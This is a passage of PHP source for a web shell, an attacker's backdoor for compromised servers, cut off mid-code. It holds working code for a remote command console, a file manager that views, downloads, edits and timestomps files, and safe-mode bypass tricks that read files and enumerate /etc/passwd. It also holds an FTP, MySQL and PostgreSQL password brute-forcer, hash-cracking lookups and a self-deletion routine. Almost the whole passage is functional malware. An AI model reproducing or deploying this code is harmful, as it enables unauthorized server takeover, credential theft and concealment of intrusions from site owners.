\'ascii2hex\',\r\n\t\t\'HEX to ASCII\' => \'hex2ascii\',\r\n\t\t\'HEX to DEC\' => \'hexdec\',\r\n\t\t\'HEX to BIN\' => \'hex2bin\',\r\n\t\t\'DEC to HEX\' => \'dechex\',\r\n\t\t\'DEC to BIN\' => \'decbin\',\r\n\t\t\'BIN to HEX\' => \'binhex\',\r\n\t\t\'BIN to DEC\' => \'bindec\',\r\n\t\t\'String to lower case\' => \'strtolower\',\r\n\t\t\'String to upper case\' => \'strtoupper\',\r\n\t\t\'Htmlspecialchars\' => \'htmlspecialchars\',\r\n\t\t\'String length\' => \'strlen\',\r\n\t);\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n\t\tob_start();\r\n\t\tif(in_array($_POST[\'p1\'], $stringTools))\r\n\t\t\techo $_POST[\'p1\']($_POST[\'p2\']);\r\n\t\t$temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n\tBOFFHeader();\r\n\techo \'<h1>String conversions</h1><div class=content>\';\r\n\tif(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n\techo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;\'><select name=\'selectTool\'>";\r\n\tforeach($stringTools as $k => $v)\r\n\t\techo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n\t\techo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".(empty($_POST[\'p1\'])?\'\':htmlspecialchars(@$_POST[\'p2\']))."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n\t}\r\n\techo"</pre></div><br><h1>Search text in files:</h1><div class=content>\r\n\t\t<form onsubmit=\\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\\"><table cellpadding=\'1\' cellspacing=\'0\' width=\'50%\'>\r\n\t\t\t<tr><td width=\'1%\'>Text:</td><td><input type=\'text\' name=\'text\' style=\'width:100%\'></td></tr>\r\n\t\t\t<tr><td>Path:</td><td><input type=\'text\' name=\'cwd\' value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\' style=\'width:100%\'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type=\'text\' name=\'filename\' value=\'*\' style=\'width:100%\'></td></tr>\r\n\t\t\t<tr><td></td><td><input type=\'submit\' value=\'>>\'></td></tr>\r\n\t\t\t</table></form>";\r\n\r\n\tfunction BOFFRecursiveGlob($path) {\r\n\t\tif(substr($path, -1) != \'/\')\r\n\t\t\t$path.=\'/\';\r\n\t\t$paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));\r\n\t\tif(is_array($paths)&&@count($paths)) {\r\n\t\t\tforeach($paths as $item) {\r\n\t\t\t\tif(@is_dir($item)){\r\n\t\t\t\t\tif($path!=$item)\r\n\t\t\t\t\t\tBOFFRecursiveGlob($item);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(@strpos(@file_get_contents($item), @$_POST[\'p2\'])!==false)\r\n\t\t\t\t\t\techo "<a href=\'#\' onclick=\'g(\\"FilesTools\\",null,\\"".urlencode($item)."\\", \\"view\\")\'>".htmlspecialchars($item)."</a><br>";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(@$_POST[\'p3\'])\r\n\t\tBOFFRecursiveGlob($_POST[\'c\']);\r\n\techo "</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method=\'post\' target=\'_blank\' name=\'hf\'>\r\n\t\t\t<input type=\'text\' name=\'hash\' style=\'width:200px;\'><br>\r\n\t\t\t<input type=\'button\' value=\'hashcrack.com\' onclick=\\"document.hf.action=\'http://www.hashcrack.com/index.php\';document.hf.submit()\\"><br>\r\n\t\t\t<input type=\'button\' value=\'milw0rm.com\' onclick=\\"document.hf.action=\'http://www.milw0rm.com/cracker/search.php\';document.hf.submit()\\"><br>\r\n\t\t\t<input type=\'button\' value=\'hashcracking.info\' onclick=\\"document.hf.action=\'https://hashcracking.info/index.php\';document.hf.submit()\\"><br>\r\n\t\t\t<input type=\'button\' value=\'md5.rednoize.com\' onclick=\\"document.hf.action=\'http://md5.rednoize.com/?q=\'+document.hf.hash.value+\'&s=md5\';document.hf.submit()\\"><br>\r\n\t\t\t<input type=\'button\' value=\'md5decrypter.com\' onclick=\\"document.hf.action=\'http://www.md5decrypter.com/\';document.hf.submit()\\"><br>\r\n\t\t</form></div>";\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionFilesTools() {\r\n\tif( isset($_POST[\'p1\']) )\r\n\t\t$_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n\tif(@$_POST[\'p2\']==\'download\') {\r\n\t\tif(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\r\n\t\t\tob_start("ob_gzhandler", 4096);\r\n\t\t\theader("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\r\n\t\t\tif (function_exists("mime_content_type")) {\r\n\t\t\t\t$type = @mime_content_type($_POST[\'p1\']);\r\n\t\t\t\theader("Content-Type: " . $type);\r\n\t\t\t} else\r\n header("Content-Type: application/octet-stream");\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], "r");\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile(!@feof($fp))\r\n\t\t\t\t\techo @fread($fp, 1024);\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}exit;\r\n\t}\r\n\tif( @$_POST[\'p2\'] == \'mkfile\' ) {\r\n\t\tif(!file_exists($_POST[\'p1\'])) {\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'w\');\r\n\t\t\tif($fp) {\r\n\t\t\t\t$_POST[\'p2\'] = "edit";\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tBOFFHeader();\r\n\techo \'<h1>File tools</h1><div class=content>\';\r\n\tif( !file_exists(@$_POST[\'p1\']) ) {\r\n\t\techo \'File not exists\';\r\n\t\tBOFFFooter();\r\n\t\treturn;\r\n\t}\r\n\t$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n\tif(!$uid) {\r\n\t\t$uid[\'name\'] = @fileowner($_POST[\'p1\']);\r\n\t\t$gid[\'name\'] = @filegroup($_POST[\'p1\']);\r\n\t} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\r\n\techo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?BOFFViewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.BOFFPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n\techo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n\tif( empty($_POST[\'p2\']) )\r\n\t\t$_POST[\'p2\'] = \'view\';\r\n\tif( is_file($_POST[\'p1\']) )\r\n\t\t$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n\telse\r\n\t\t$m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n\tforeach($m as $v)\r\n\t\techo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n\techo \'<br><br>\';\r\n\tswitch($_POST[\'p2\']) {\r\n\t\tcase \'view\':\r\n\t\t\techo \'<pre class=ml1>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</pre>\';\r\n\t\t\tbreak;\r\n\t\tcase \'highlight\':\r\n\t\t\tif( @is_readable($_POST[\'p1\']) ) {\r\n\t\t\t\techo \'<div class=ml1 style="background-color: #e1e1e1;color:black;">\';\r\n\t\t\t\t$code = @highlight_file($_POST[\'p1\'],true);\r\n\t\t\t\techo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase \'chmod\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$perms = 0;\r\n\t\t\t\tfor($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\r\n\t\t\t\t\t$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n\t\t\t\tif(!@chmod($_POST[\'p1\'], $perms))\r\n\t\t\t\t\techo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";</script>\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'edit\':\r\n\t\t\tif( !is_writable($_POST[\'p1\'])) {\r\n\t\t\t\techo \'File isn\\\'t writeable\';\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = @filemtime($_POST[\'p1\']);\r\n\t\t\t\t$_POST[\'p3\'] = substr($_POST[\'p3\'],1);\r\n\t\t\t\t$fp = @fopen($_POST[\'p1\'],"w");\r\n\t\t\t\tif($fp) {\r\n\t\t\t\t\t@fwrite($fp,$_POST[\'p3\']);\r\n\t\t\t\t\t@fclose($fp);\r\n\t\t\t\t\techo \'Saved!<br><script>p3_="";</script>\';\r\n\t\t\t\t\t@touch($_POST[\'p1\'],$time,$time);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,null,null,\\\'1\\\'+this.text.value);return false;"><textarea name=text class=bigarea>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</textarea><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'hexdump\':\r\n\t\t\t$c = @file_get_contents($_POST[\'p1\']);\r\n\t\t\t$n = 0;\r\n\t\t\t$h = array(\'00000000<br>\',\'\',\'\');\r\n\t\t\t$len = strlen($c);\r\n\t\t\tfor ($i=0; $i<$len; ++$i) {\r\n\t\t\t\t$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n\t\t\t\tswitch ( ord($c[$i]) ) {\r\n\t\t\t\t\tcase 0: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 9: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 10: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 13: $h[2] .= \' \'; break;\r\n\t\t\t\t\tdefault: $h[2] .= $c[$i]; break;\r\n\t\t\t\t}\r\n\t\t\t\t$n++;\r\n\t\t\t\tif ($n == 32) {\r\n\t\t\t\t\t$n = 0;\r\n\t\t\t\t\tif ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}\r\n\t\t\t\t\t$h[1] .= \'<br>\';\r\n\t\t\t\t\t$h[2] .= "\\n";\r\n\t\t\t\t}\r\n\t\t \t}\r\n\t\t\techo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n\t\t\tbreak;\r\n\t\tcase \'rename\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\tif(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\r\n\t\t\t\t\techo \'Can\\\'t rename!<br>\';\r\n\t\t\t\telse\r\n\t\t\t\t\tdie(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'touch\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = strtotime($_POST[\'p3\']);\r\n\t\t\t\tif($time) {\r\n\t\t\t\t\tif(!touch($_POST[\'p1\'],$time,$time))\r\n\t\t\t\t\t\techo \'Fail!\';\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\techo \'Touched!\';\r\n\t\t\t\t} else echo \'Bad time format!\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n\t\t\tbreak;\r\n\t}\r\n\techo \'</div>\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionSafeMode() {\r\n\t$temp=\'\';\r\n\tob_start();\r\n\tswitch($_POST[\'p1\']) {\r\n\t\tcase 1:\r\n\t\t\t$temp=@tempnam($test, \'cx\');\r\n\t\t\tif(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){\r\n\t\t\t\techo @file_get_contents($temp);\r\n\t\t\t\tunlink($temp);\r\n\t\t\t} else\r\n\t\t\t\techo \'Sorry... Can\\\'t open file\';\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\t$files = glob($_POST[\'p2\'].\'*\');\r\n\t\t\tif( is_array($files) )\r\n\t\t\t\tforeach ($files as $filename)\r\n\t\t\t\t\techo $filename."\\n";\r\n\t\t\tbreak;\r\n\t\tcase 3:\r\n\t\t\t$ch = curl_init("file://".$_POST[\'p2\']."\\x00".preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__));\r\n\t\t\tcurl_exec($ch);\r\n\t\t\tbreak;\r\n\t\tcase 4:\r\n\t\t\tini_restore("safe_mode");\r\n\t\t\tini_restore("open_basedir");\r\n\t\t\tinclude($_POST[\'p2\']);\r\n\t\t\tbreak;\r\n\t\tcase 5:\r\n\t\t\tfor(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\r\n\t\t\t\t$uid = @posix_getpwuid($_POST[\'p2\']);\r\n\t\t\t\tif ($uid)\r\n\t\t\t\t\techo join(\':\',$uid)."\\n";\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t}\r\n\t$temp = ob_get_clean();\r\n\tBOFFHeader();\r\n\techo \'<h1>Safe mode bypass</h1><div class=content>\';\r\n\techo \'<span>Copy (read file)</span><form onsubmit=\\\'g(null,null,"1",this.param.value);return false;\\\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\\\'g(null,null,"2",this.param.value);return false;\\\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\\\'g(null,null,"3",this.param.value);return false;\\\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\\\'g(null,null,"4",this.param.value);return false;\\\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\\\'g(null,null,"5",this.param1.value,this.param2.value);return false;\\\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>\';\r\n\tif($temp)\r\n\t\techo \'<pre class="ml1" style="margin-top:5px" id="Output">\'.htmlspecialchars($temp).\'</pre>\';\r\n\techo \'</div>\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionConsole() {\r\n if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\'] = true;\r\n $_POST[\'p1\'] .= \' 2>&1\';\r\n } elseif(!empty($_POST[\'p1\']))\r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\'] = false;\r\n\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n\t\tob_start();\r\n\t\techo "d.cf.cmd.value=\'\';\\n";\r\n\t\t$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".BOFFEx($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n\t\tif(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match))\t{\r\n\t\t\tif(@chdir($match[1])) {\r\n\t\t\t\t$GLOBALS[\'cwd\'] = @getcwd();\r\n\t\t\t\techo "c_=\'".$GLOBALS[\'cwd\']."\';";\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "d.cf.output.value+=\'".$temp."\';";\r\n\t\techo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\r\n\t\t$temp = ob_get_clean();\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n\tBOFFHeader();\r\n echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array(\'\');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push(\'\');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>";\r\n\techo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\\\'clear\\\'){d.cf.output.value=\\\'\\\';d.cf.cmd.value=\\\'\\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');} return false;"><select name=alias>\';\r\n\tforeach($GLOBALS[\'aliases\'] as $n => $v) {\r\n\t\tif($v == \'\') {\r\n\t\t\techo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\techo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n\t}\r\n\tif(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n\techo \'</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX <input type=checkbox name=show_errors value=1 \'.(!empty($_POST[\'p2\'])||$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']?\'checked\':\'\').\'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\techo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".BOFFEx($_POST[\'p1\']));\r\n\t}\r\n\techo \'</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>\';\r\n\techo \'</form></div><script>d.cf.cmd.focus();</script>\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionLogout() {\r\n session_destroy();\r\n\tdie(\'bye!\');\r\n}\r\n\r\nfunction actionSelfRemove() {\r\n\t\r\n\tif($_POST[\'p1\'] == \'yes\')\r\n\t\tif(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\r\n\t\t\tdie(\'Shell has been removed\');\r\n\t\telse\r\n\t\t\techo \'unlink error!\';\r\n if($_POST[\'p1\'] != \'yes\')\r\n BOFFHeader();\r\n\techo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionBruteforce() {\r\n\tBOFFHeader();\r\n\tif( isset($_POST[\'proto\']) ) {\r\n\t\techo \'<h1>Results</h1><div class=content><span>Type:</span> \'.htmlspecialchars($_POST[\'proto\']).\' <span>Server:</span> \'.htmlspecialchars($_POST[\'server\']).\'<br>\';\r\n\t\tif( $_POST[\'proto\'] == \'ftp\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$fp = @ftp_connect($ip, $port?$port:21);\r\n\t\t\t\tif(!$fp) return false;\r\n\t\t\t\t$res = @ftp_login($fp, $login, $pass);\r\n\t\t\t\t@ftp_close($fp);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t} elseif( $_POST[\'proto\'] == \'mysql\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$res = @mysql_connect($ip.\':\'.$port?$port:3306, $login, $pass);\r\n\t\t\t\t@mysql_close($res);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t} elseif( $_POST[\'proto\'] == \'pgsql\' ) {\r\n\t\t\tfunction bruteForce($ip,$port,$login,$pass) {\r\n\t\t\t\t$str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres";\r\n\t\t\t\t$res = @pg_connect($str);\r\n\t\t\t\t@pg_close($res);\r\n\t\t\t\treturn $res;\r\n\t\t\t}\r\n\t\t}\r\n\t\t$success = 0;\r\n\t\t$attempts = 0;\r\n\t\t$server = explode(":", $_POST[\'server\']);\r\n\t\tif($_POST[\'type\'] == 1) {\r\n\t\t\t$temp = @file(\'/etc/passwd\');\r\n\t\t\tif( is_array($temp) )\r\n\t\t\t\tforeach($temp as $line) {\r\n\t\t\t\t\t$line = explode(":", $line);\r\n\t\t\t\t\t++$attempts;\r\n\t\t\t\t\tif( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {\r\n\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($line[0]).\'<br>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(@$_POST[\'reverse\']) {\r\n\t\t\t\t\t\t$tmp = "";\r\n\t\t\t\t\t\tfor($i=strlen($line[0])-1; $i>=0; --$i)\r\n\t\t\t\t\t\t\t$tmp .= $line[0][$i];\r\n\t\t\t\t\t\t++$attempts;\r\n\t\t\t\t\t\tif( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {\r\n\t\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($tmp);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t} elseif($_POST[\'type\'] == 2) {\r\n\t\t\t$temp = @file($_POST[\'dict\']);\r\n\t\t\tif( is_array($temp) )\r\n\t\t\t\tforeach($temp as $line) {\r\n\t\t\t\t\t$line = trim($line);\r\n\t\t\t\t\t++$attempts;\r\n\t\t\t\t\tif( bruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {\r\n\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($_POST[\'login\']).\'</b>:\'.htmlspecialchars($line).\'<br>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t}\r\n\t\techo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";\r\n\t}\r\n\techo \'<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>\'\r\n\t\t.\'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>\'\r\n\t\t.\'<input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\'\r\n\t\t.\'<input type=hidden name=a value="\'.htmlspecialchars($_POST[\'a\']).\'">\'\r\n\t\t.\'<input type=hidden name=charset value="\'.htmlspecialchars($_POST[\'charset\']).\'">\'\r\n\t\t.\'<span>Server:port</span></td>\'\r\n\t\t.\'<td><input type=text name=server value="127.0.0.1"></td></tr>\'\r\n\t\t.\'<tr><td><span>Brute type</span></td>\'\r\n\t\t.\'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>\'\r\n\t\t.\'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>\'\r\n\t\t.\'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>\'\r\n\t\t.\'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>\'\r\n\t\t.\'<td><input type=text name=login value="root"></td></tr>\'\r\n\t\t.\'<tr><td><span>Dictionary</span></td>\'\r\n\t\t.\'<td><input type=text name=dict value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'passwd.dic"></td></tr></table>\'\r\n\t\t.\'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>\';\r\n\techo \'</div><br>\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionSql() {\r\n\tclass DbClass {\r\n\t\tvar $type;\r\n\t\tvar $link;\r\n\t\tvar $res;\r\n\t\tfunction DbClass($type)\t{\r\n\t\t\t$this->type = $type;\r\n\t\t}\r\n\t\tfunction connect($host, $user, $pass, $dbname){\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$host = explode(\':\', $host);\r\n\t\t\t\t\tif(!$host[1]) $host[1]=5432;\r\n\t\t\t\t\tif( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction selectdb($db) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif (@mysql_select_db($db))return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction query($str) {\r\n\t\t\tswitch($this->type) {\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = @mysql_query($str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = @pg_query($this->link,$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction fetch() {\r\n\t\t\t$res = func_num_args()?func_get_arg(0):$this->res;\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn 